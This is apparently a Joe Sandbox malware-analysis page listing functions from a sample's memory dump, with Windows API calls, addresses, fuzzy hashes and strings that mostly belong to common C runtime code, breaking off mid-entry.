Associated: 00000005.00000002.1779503007.00007FFDF7CA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781114786.00007FFDF7DFE000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781519730.00007FFDF7E42000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781656419.00007FFDF7E43000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781728705.00007FFDF7E46000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781824762.00007FFDF7E48000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdf7ca0000_main.jbxd

Similarity

API ID: FileWrite$ByteCharConsoleErrorLastMultiWide
String ID:
API String ID: 3659116390-0
Opcode ID: 894bc5ef5e5ce7df39513d38449063517b4f88948e0e894e952ffd6e864881c1
Instruction ID: 05228bdbd06323864a44057a4a143fad7097855c050eca733789cdd9a2ae6600
Opcode Fuzzy Hash: 894bc5ef5e5ce7df39513d38449063517b4f88948e0e894e952ffd6e864881c1
Instruction Fuzzy Hash: 2151B03AB18A5185E711CB7AD854BEC3BB0FB48B88F058136DE2E576A8DF38D155C700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFDF7CADC8C Relevance: 7.6, APIs: 5, Instructions: 114libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,00000000,FFFFFFFF,00007FFDF7CAE057,?,?,00000000,00007FFDF7CADBEB,?,?,?,00007FFDF7CA7B91), ref: 00007FFDF7CADDAE

Memory Dump Source

Source File: 00000005.00000002.1779539396.00007FFDF7CA1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDF7CA0000, based on PE: true

Associated: 00000005.00000002.1779503007.00007FFDF7CA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781114786.00007FFDF7DFE000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781519730.00007FFDF7E42000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781656419.00007FFDF7E43000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781728705.00007FFDF7E46000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781824762.00007FFDF7E48000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdf7ca0000_main.jbxd

Similarity

API ID: AddressProc
String ID:
API String ID: 190572456-0
Opcode ID: fabb535afc105e0decfbfdb6db9c1eda5200b98fe264e1058d53e9e6ab103bd2
Instruction ID: 17006af3dd743cae48793af6676b8247c89d1152380ea2e4aa38b85dc8e36782
Opcode Fuzzy Hash: fabb535afc105e0decfbfdb6db9c1eda5200b98fe264e1058d53e9e6ab103bd2
Instruction Fuzzy Hash: 0941BE29F19A4281FB259B02A834AF96696FF58B95F094536DD3E4F3DCEE3CE4408350

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFDF7CA4008 Relevance: 7.6, APIs: 5, Instructions: 60threadCOMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FFDF7CA402C
CreateThread.KERNEL32 ref: 00007FFDF7CA406D
GetLastError.KERNEL32 ref: 00007FFDF7CA407B
CloseHandle.KERNEL32 ref: 00007FFDF7CA4098
FreeLibrary.KERNEL32 ref: 00007FFDF7CA40A7

Memory Dump Source

Source File: 00000005.00000002.1779539396.00007FFDF7CA1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDF7CA0000, based on PE: true

Associated: 00000005.00000002.1779503007.00007FFDF7CA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781114786.00007FFDF7DFE000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781519730.00007FFDF7E42000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781656419.00007FFDF7E43000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781728705.00007FFDF7E46000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781824762.00007FFDF7E48000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdf7ca0000_main.jbxd

Similarity

API ID: CloseCreateErrorFreeHandleLastLibraryThread_invalid_parameter_noinfo
String ID:
API String ID: 2067211477-0
Opcode ID: b040001a0cb2e06cd7971e6aff8f1e273238e5935e601b8e5b063557bdae92d1
Instruction ID: f746020d55b22bd60839fcbf3abbfe281ab743db3b6e4f3ec39cebc9a2b8ffbf
Opcode Fuzzy Hash: b040001a0cb2e06cd7971e6aff8f1e273238e5935e601b8e5b063557bdae92d1
Instruction Fuzzy Hash: 55214F2AF0974282FF149F69A4348FEA2A0AF84B81F484535DE6D4B7DDDE3CE5059740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFDF7CACBB4 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 00007FFDF7CACBDB
_set_statfp.LIBCMT ref: 00007FFDF7CACBF6
_set_statfp.LIBCMT ref: 00007FFDF7CACC12
_set_statfp.LIBCMT ref: 00007FFDF7CACC4E

Memory Dump Source

Source File: 00000005.00000002.1779539396.00007FFDF7CA1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDF7CA0000, based on PE: true

Associated: 00000005.00000002.1779503007.00007FFDF7CA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781114786.00007FFDF7DFE000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781519730.00007FFDF7E42000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781656419.00007FFDF7E43000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781728705.00007FFDF7E46000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781824762.00007FFDF7E48000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdf7ca0000_main.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: 8ededab4c003fc5eb50d30b88c498eb80175c93f409c79947cc45d833528cf34
Instruction ID: a6c502013ddb0214d23ec57cad11f1f1a910c45b1660eaafb71cd285e3da10af
Opcode Fuzzy Hash: 8ededab4c003fc5eb50d30b88c498eb80175c93f409c79947cc45d833528cf34
Instruction Fuzzy Hash: 0E11587EF1CA0601F7781129F472BFD51817F553AAF095234EB7E0A6DECE1DA8844244

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFDF7CA3F34 Relevance: 7.5, APIs: 5, Instructions: 31threadCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FFDF7CADB8C: GetLastError.KERNEL32(?,?,?,00007FFDF7CA7B91,?,?,?,?,00007FFDF7CACA6B,?,?,00000000,00007FFDF7CADB31,?,?,?), ref: 00007FFDF7CADB9B
Part of subcall function 00007FFDF7CADB8C: SetLastError.KERNEL32(?,?,?,00007FFDF7CA7B91,?,?,?,?,00007FFDF7CACA6B,?,?,00000000,00007FFDF7CADB31,?,?,?), ref: 00007FFDF7CADC05

ExitThread.KERNEL32 ref: 00007FFDF7CA3F4C
ExitThread.KERNEL32 ref: 00007FFDF7CA3F61

Memory Dump Source

Source File: 00000005.00000002.1779539396.00007FFDF7CA1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDF7CA0000, based on PE: true

Associated: 00000005.00000002.1779503007.00007FFDF7CA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781114786.00007FFDF7DFE000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781519730.00007FFDF7E42000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781656419.00007FFDF7E43000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781728705.00007FFDF7E46000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781824762.00007FFDF7E48000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdf7ca0000_main.jbxd

Similarity

API ID: ErrorExitLastThread
String ID:
API String ID: 1611280651-0
Opcode ID: ae2abdbe39501b5126202329e052ee4fe7fa4409f0de5eadbc0f8828924965ef
Instruction ID: 8dcfa2f57cb12dee9e1dca6ba7c8f0a01ef24d10101ea2eff2531f54a354a9e9
Opcode Fuzzy Hash: ae2abdbe39501b5126202329e052ee4fe7fa4409f0de5eadbc0f8828924965ef
Instruction Fuzzy Hash: 51011E29B1868296FB146B6198786FC22A1AF80F76F540739D63E076D9DF2CE4988300

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFDF7CA4814 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 177COMMON

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 00007FFDF7CA486C

Strings

", xrefs: 00007FFDF7CA48E0
sinh, xrefs: 00007FFDF7CA48D9

Memory Dump Source

Source File: 00000005.00000002.1779539396.00007FFDF7CA1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDF7CA0000, based on PE: true

Associated: 00000005.00000002.1779503007.00007FFDF7CA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781114786.00007FFDF7DFE000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781519730.00007FFDF7E42000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781656419.00007FFDF7E43000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781728705.00007FFDF7E46000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781824762.00007FFDF7E48000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdf7ca0000_main.jbxd

Similarity

API ID: _set_statfp
String ID: "$sinh
API String ID: 1156100317-1232919748
Opcode ID: 3643758de30a882a8f8f591e8e08a8aeed0c1ba10f89767e26bfdd5b49b26de4
Instruction ID: 6682fd103822db11dbecd1a17178373f0b617dce68be6dcaf9969795c2a4fb09
Opcode Fuzzy Hash: 3643758de30a882a8f8f591e8e08a8aeed0c1ba10f89767e26bfdd5b49b26de4
Instruction Fuzzy Hash: C391B925F18F8588E3638B34A4617F97358AF6A3D5F109337D5AE36AA9DF2C91438700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFDF7CA804C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FFDF7CA8073
_invalid_parameter_noinfo.LIBCMT ref: 00007FFDF7CA8245

Strings

*, xrefs: 00007FFDF7CA8179
, xrefs: 00007FFDF7CA81CE

Memory Dump Source

Source File: 00000005.00000002.1779539396.00007FFDF7CA1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDF7CA0000, based on PE: true

Associated: 00000005.00000002.1779503007.00007FFDF7CA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781114786.00007FFDF7DFE000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781519730.00007FFDF7E42000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781656419.00007FFDF7E43000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781728705.00007FFDF7E46000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781824762.00007FFDF7E48000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdf7ca0000_main.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: $*
API String ID: 3215553584-3982473090
Opcode ID: 1b58e9775382402b4d775ae5f3c59ba3f45e37bcb3e1bf27df69a781bd90abda
Instruction ID: ada6cd960c13df518fa429389e53ec0edc9deb7f0f37fdd41e4a3538915a5648
Opcode Fuzzy Hash: 1b58e9775382402b4d775ae5f3c59ba3f45e37bcb3e1bf27df69a781bd90abda
Instruction Fuzzy Hash: DD51207AE0C6428BF7668E24C074BBC3AE1EB15B1AF141236C76A491DDCF6CD8A5C605

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFDF7CA5274 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 139COMMON

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 00007FFDF7CA532E

Strings

!, xrefs: 00007FFDF7CA5363
acos, xrefs: 00007FFDF7CA5341

Memory Dump Source

Source File: 00000005.00000002.1779539396.00007FFDF7CA1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDF7CA0000, based on PE: true

Associated: 00000005.00000002.1779503007.00007FFDF7CA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781114786.00007FFDF7DFE000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781519730.00007FFDF7E42000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781656419.00007FFDF7E43000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781728705.00007FFDF7E46000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781824762.00007FFDF7E48000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdf7ca0000_main.jbxd

Similarity

API ID: _set_statfp
String ID: !$acos
API String ID: 1156100317-2870037509
Opcode ID: 07d545cf4db2b1446ceb485d3d67b44514844ff59f858671c097b9b673844ea4
Instruction ID: 0ab0496d792b9fcf7dd8bddce719f507c4e07edb78aba2aedf8a450124e93482
Opcode Fuzzy Hash: 07d545cf4db2b1446ceb485d3d67b44514844ff59f858671c097b9b673844ea4
Instruction Fuzzy Hash: A8617825E28F8585F3138B7468316F99754AFA6391F51D336E97E36AE8DF2CD0824600

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFDF7CA4CF8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 133COMMON

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 00007FFDF7CA4DAA

Strings

!, xrefs: 00007FFDF7CA4DDF
asin, xrefs: 00007FFDF7CA4DBD

Memory Dump Source

Source File: 00000005.00000002.1779539396.00007FFDF7CA1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDF7CA0000, based on PE: true

Associated: 00000005.00000002.1779503007.00007FFDF7CA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781114786.00007FFDF7DFE000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781519730.00007FFDF7E42000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781656419.00007FFDF7E43000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781728705.00007FFDF7E46000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781824762.00007FFDF7E48000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdf7ca0000_main.jbxd

Similarity

API ID: _set_statfp
String ID: !$asin
API String ID: 1156100317-2188059690
Opcode ID: d74fd2c3d4a11866d02b2c9ba5c1347239424a1760a41e88894f38a774cea3b2
Instruction ID: 6c341304a91ff95ebf5eedef5020cd4778c5bb3483111e090f061c46e34e0292
Opcode Fuzzy Hash: d74fd2c3d4a11866d02b2c9ba5c1347239424a1760a41e88894f38a774cea3b2
Instruction Fuzzy Hash: B161BD25E18F8585F353CB345C316F99354AFA63D5F509332E97E36AE9DF1DA0424600

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFDF7CB7A18 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32 ref: 00007FFDF7CB7AFE
WriteFile.KERNEL32 ref: 00007FFDF7CB7B31
GetLastError.KERNEL32 ref: 00007FFDF7CB7B53

Strings

U, xrefs: 00007FFDF7CB7ADC

Memory Dump Source

Source File: 00000005.00000002.1779539396.00007FFDF7CA1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDF7CA0000, based on PE: true

Associated: 00000005.00000002.1779503007.00007FFDF7CA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781114786.00007FFDF7DFE000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781519730.00007FFDF7E42000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781656419.00007FFDF7E43000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781728705.00007FFDF7E46000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781824762.00007FFDF7E48000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdf7ca0000_main.jbxd

Similarity

API ID: ByteCharErrorFileLastMultiWideWrite
String ID: U
API String ID: 2456169464-4171548499
Opcode ID: 38ee025a910e053c27d691d14efbbeb1de41849233a684e62a5f876355649c8f
Instruction ID: 82306d085df8d6cddacb8fd9825d7502c756bafcdde5e0a7a98423948c74eb43
Opcode Fuzzy Hash: 38ee025a910e053c27d691d14efbbeb1de41849233a684e62a5f876355649c8f
Instruction Fuzzy Hash: A741A526B1868182EB608F25E864BFA77A1F798794F444132EE5D87798DF3CD511CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFDF7CED1D0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 94COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFDF7CF1120: GetModuleHandleW.KERNEL32 ref: 00007FFDF7CF116F
Part of subcall function 00007FFDF7CF1120: OutputDebugStringA.KERNEL32 ref: 00007FFDF7CF1188
Part of subcall function 00007FFDF7CF1120: GetProcAddress.KERNEL32 ref: 00007FFDF7CF1198
Part of subcall function 00007FFDF7CF1120: OutputDebugStringA.KERNEL32 ref: 00007FFDF7CF13A3
Part of subcall function 00007FFDF7CF1120: OutputDebugStringA.KERNEL32 ref: 00007FFDF7CF142E

OutputDebugStringA.KERNEL32 ref: 00007FFDF7CED268
OutputDebugStringA.KERNEL32 ref: 00007FFDF7CED299

Part of subcall function 00007FFDF7CF01D0: OutputDebugStringA.KERNEL32 ref: 00007FFDF7CF0268
Part of subcall function 00007FFDF7CF01D0: OutputDebugStringA.KERNEL32 ref: 00007FFDF7CF0A7F
Part of subcall function 00007FFDF7CF01D0: HeapFree.KERNEL32 ref: 00007FFDF7CF0ACE
Part of subcall function 00007FFDF7CF01D0: OutputDebugStringA.KERNEL32 ref: 00007FFDF7CF0B10

Strings

API called without activation, xrefs: 00007FFDF7CED292, 00007FFDF7CED29F
API called without license: %ld (0x%lx), xrefs: 00007FFDF7CED24D

Memory Dump Source

Source File: 00000005.00000002.1779539396.00007FFDF7CA1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDF7CA0000, based on PE: true

Associated: 00000005.00000002.1779503007.00007FFDF7CA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781114786.00007FFDF7DFE000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781519730.00007FFDF7E42000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781656419.00007FFDF7E43000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781728705.00007FFDF7E46000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781824762.00007FFDF7E48000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdf7ca0000_main.jbxd

Similarity

API ID: DebugOutputString$AddressFreeHandleHeapModuleProc
String ID: API called without activation$API called without license: %ld (0x%lx)
API String ID: 323638051-1210341260
Opcode ID: e3428bc0ae786138bd28bc750f2034a99ddd2e6537b5937e316fe7cc99642038
Instruction ID: 46a5950e36108595ea5519caad68ad8b90d03915ee5c5a75b4dbd3709ab3ac0a
Opcode Fuzzy Hash: e3428bc0ae786138bd28bc750f2034a99ddd2e6537b5937e316fe7cc99642038
Instruction Fuzzy Hash: 86415F6AB18A8781FB119B21E871FFD2361AF95B85F440032D92E876DDDE2DE8858340

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFDF7CB028C Relevance: 6.1, APIs: 4, Instructions: 104COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FFDF7CB02DF
WideCharToMultiByte.KERNEL32 ref: 00007FFDF7CB03B1
GetLastError.KERNEL32 ref: 00007FFDF7CB03D4
_invalid_parameter_noinfo.LIBCMT ref: 00007FFDF7CB0406

Memory Dump Source

Source File: 00000005.00000002.1779539396.00007FFDF7CA1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDF7CA0000, based on PE: true

Associated: 00000005.00000002.1779503007.00007FFDF7CA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781114786.00007FFDF7DFE000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781519730.00007FFDF7E42000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781656419.00007FFDF7E43000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781728705.00007FFDF7E46000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781824762.00007FFDF7E48000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdf7ca0000_main.jbxd

Similarity

API ID: _invalid_parameter_noinfo$ByteCharErrorLastMultiWide
String ID:
API String ID: 4141327611-0
Opcode ID: 4a9a1d822b6a8b040ec9aa0fd6a5aed8344dd3ab8f3b83e52faaa69329a41ab6
Instruction ID: b02738357dd677b11f54d3d9982a91fb77c556379f6c1c7c710b9330636ad344
Opcode Fuzzy Hash: 4a9a1d822b6a8b040ec9aa0fd6a5aed8344dd3ab8f3b83e52faaa69329a41ab6
Instruction Fuzzy Hash: ED41A429B0D78247FB658B199274BFE6290EF80B90F154134EAAD47ADDDF3CD8958700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFDF7CB2C7C Relevance: 6.1, APIs: 4, Instructions: 74COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FFDF7CABF87,?,?,?,00007FFDF7CABF42), ref: 00007FFDF7CB2C95
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FFDF7CABF87,?,?,?,00007FFDF7CABF42), ref: 00007FFDF7CB2CF7
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FFDF7CABF87,?,?,?,00007FFDF7CABF42), ref: 00007FFDF7CB2D31
FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FFDF7CABF87,?,?,?,00007FFDF7CABF42), ref: 00007FFDF7CB2D5B

Memory Dump Source

Source File: 00000005.00000002.1779539396.00007FFDF7CA1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDF7CA0000, based on PE: true

Associated: 00000005.00000002.1779503007.00007FFDF7CA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781114786.00007FFDF7DFE000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781519730.00007FFDF7E42000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781656419.00007FFDF7E43000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781728705.00007FFDF7E46000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781824762.00007FFDF7E48000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdf7ca0000_main.jbxd

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$Free
String ID:
API String ID: 1557788787-0
Opcode ID: cb58bb46e136a436cc3296d3954f439073ad99571ec6db683707ab458abb8294
Instruction ID: 267c5f39dbff2ca203c1d3f5a53c484a11fba98b3ef91b48ba152e2751e82bad
Opcode Fuzzy Hash: cb58bb46e136a436cc3296d3954f439073ad99571ec6db683707ab458abb8294
Instruction Fuzzy Hash: 05219536F0879181E7609F2568104AD66A4FB88BD0B484234EE6E67BECDF3CE4628740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFDF7CADAF8 Relevance: 6.0, APIs: 4, Instructions: 43COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00007FFDF7CA4120,?,?,?,00007FFDF7CA8FBD), ref: 00007FFDF7CADB02
SetLastError.KERNEL32(?,?,?,00007FFDF7CA4120,?,?,?,00007FFDF7CA8FBD), ref: 00007FFDF7CADB6A
SetLastError.KERNEL32(?,?,?,00007FFDF7CA4120,?,?,?,00007FFDF7CA8FBD), ref: 00007FFDF7CADB80
abort.LIBCMT ref: 00007FFDF7CADB86

Memory Dump Source

Source File: 00000005.00000002.1779539396.00007FFDF7CA1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDF7CA0000, based on PE: true

Associated: 00000005.00000002.1779503007.00007FFDF7CA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781114786.00007FFDF7DFE000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781519730.00007FFDF7E42000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781656419.00007FFDF7E43000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781728705.00007FFDF7E46000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781824762.00007FFDF7E48000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdf7ca0000_main.jbxd

Similarity

API ID: ErrorLast$abort
String ID:
API String ID: 1447195878-0
Opcode ID: 47afe63ff740905e512948011b226e73666ca28023fb5725211ab947658236f7
Instruction ID: 27bfff09ff95b95a9d41b6d45b17ebd7e6e3846ca6947f398f70c20e96ee5be8
Opcode Fuzzy Hash: 47afe63ff740905e512948011b226e73666ca28023fb5725211ab947658236f7
Instruction Fuzzy Hash: 6201002CF0974742FB69AB756579DFC1191AF84B92F141538D93E0B7DEED2DA8448200

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFDF7CB07D8 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 245COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FFDF7CB083C

Strings

gfffffff, xrefs: 00007FFDF7CB0ACA

Memory Dump Source

Source File: 00000005.00000002.1779539396.00007FFDF7CA1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDF7CA0000, based on PE: true

Associated: 00000005.00000002.1779503007.00007FFDF7CA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781114786.00007FFDF7DFE000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781519730.00007FFDF7E42000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781656419.00007FFDF7E43000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781728705.00007FFDF7E46000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781824762.00007FFDF7E48000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdf7ca0000_main.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: gfffffff
API String ID: 3215553584-1523873471
Opcode ID: 863c0f8b7451d09d39ac029bcc34361f75aaf615dff75afee98cc58ccee12c6e
Instruction ID: 3f6e5d7ac1803927b5c2184df7d1b5646ca665fea021ffd6969b524dbc9c359f
Opcode Fuzzy Hash: 863c0f8b7451d09d39ac029bcc34361f75aaf615dff75afee98cc58ccee12c6e
Instruction Fuzzy Hash: B5915766F0938686EB258F2D9160BFC6B55AB217C0F058131DBAD073D9DE3DE1A2C301

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFDF7CB0C08 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 138COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FFDF7CB0C4B

Strings

e+000, xrefs: 00007FFDF7CB0CF3
gfff, xrefs: 00007FFDF7CB0D76

Memory Dump Source

Source File: 00000005.00000002.1779539396.00007FFDF7CA1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDF7CA0000, based on PE: true

Associated: 00000005.00000002.1779503007.00007FFDF7CA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
